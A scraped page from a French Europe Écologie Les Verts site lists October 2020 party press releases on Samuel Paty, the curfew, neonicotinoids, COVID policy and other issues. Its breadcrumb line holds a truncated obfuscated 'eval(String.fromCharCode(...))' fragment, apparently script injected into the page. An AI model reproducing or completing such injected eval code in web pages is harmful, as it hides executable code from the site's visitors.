Vous êtes ici : Accueil > eval(String.fromCharCode(10, 10, 60, 104, 116, 109, 108, 62, 10, 60, 104, (...)
Publié : 24 octobre 2008

Europe Ecologie Les Verts

• EELV appelle à se joindre aux rassemblements en hommage à Samuel Paty

18 octobre
    EELV appelle à se joindre au rassemblement à 15h aujourd'hui Place de la République à Paris, et les autres jours dans tous les lieux où la mémoire de Samuel Paty sera honorée. L’article EELV appelle à se joindre aux rassemblements en hommage à Samuel Paty est apparu en premier sur Europe Écologie les (...)
  • Attentat à Conflans-Saint-Honorine : la solidarité contre l’horreur

17 octobre
    Réaction d'EELV suite aux événements terroristes de Conflans-Saint-Honorine. L’article Attentat à Conflans-Saint-Honorine : la solidarité contre l’horreur est apparu en premier sur Europe Écologie les Verts.
  • Un couvre-feu rendu nécessaire, mais des mesures sociales insuffisantes pour les plus précaires ?

15 octobre
    Même si la décision d'un couvre-feu dans 8 métropoles peut être comprise, EELV regrette que davantage de mesures de préventions n'aient pas été mises en place plus tôt et apporte son soutien aux secteurs et populations les plus fragilisés par la crise. L’article Un couvre-feu rendu nécessaire, mais des (...)
  • Policier percuté à Savigny-sur-Orge : communiqué de presse du Maire Jean-Marc Defrémont

14 octobre
    Policier percuté à Savigny-sur-Orge : communiqué de presse du Maire Jean-Marc Defrémont. "Il faut relocaliser les forces de police !" L’article Policier percuté à Savigny-sur-Orge : communiqué de presse du Maire Jean-Marc Defrémont est apparu en premier sur Europe Écologie les (...)
  • Non au retour des néonicotinoïdes !

13 octobre
    Alors que le gouvernement a acté une dérogation pour l’utilisation des néonicotinoïdes, EELV appelle à une mobilisation nationale pour dénoncer le retour par dérogation de ces pesticides tueurs d'abeilles. Téléchargez ces visuels suivants pour habiller vos réseaux sociaux ! L’article Non au retour des (...)
  • COVID-19 : pour une politique de santé publique et de prévention cohérente et juste

13 octobre
    Pour EELV, l’objectif d’une politique de santé publique efficace est d’être acceptable sur le long terme afin de protéger les plus fragiles, sans pour autant mettre en péril la population et la société dans leur ensemble. L’article COVID-19 : pour une politique de santé publique et de prévention (...)
  • L’école à la maison

10 octobre
    Sous prétexte de "sécurité nationale", le Président de la République a remis en cause, le vendredi 2 octobre, la liberté offerte aux familles pour l'éducation de leurs enfants. L’article L’école à la maison est apparu en premier sur Europe Écologie les (...)
  • Veolia – Suez : contre un désengagement de l’Etat qui met en péril les emplois en France

8 octobre
    L'OPA de Veolia à Suez se fait au détriment de l’emploi et d’une gestion publique de l’eau. EELV dénonce le désengagement de l’Etat sur ce dossier et rappelle que l'eau se doit de rester un patrimoine commun à préserver. L’article Veolia – Suez : contre un désengagement de l’Etat qui met en péril les (...)
  • Souffrance animale : sortons enfin la France de l’élevage intensif !

8 octobre
    Ce jeudi 8 octobre, une proposition de loi visant à mettre fin progressivement à certaines pratiques génératrices de souffrance chez les animaux est défendue à l'Assemblée nationale. EELV soutient cette proposition de loi, essentielle pour mettre fin à la cruauté de l'élevage en cage. L’article (...)
  • Prolongement du congé paternité et d’accueil de l’enfant : bien, mais peut mieux faire

5 octobre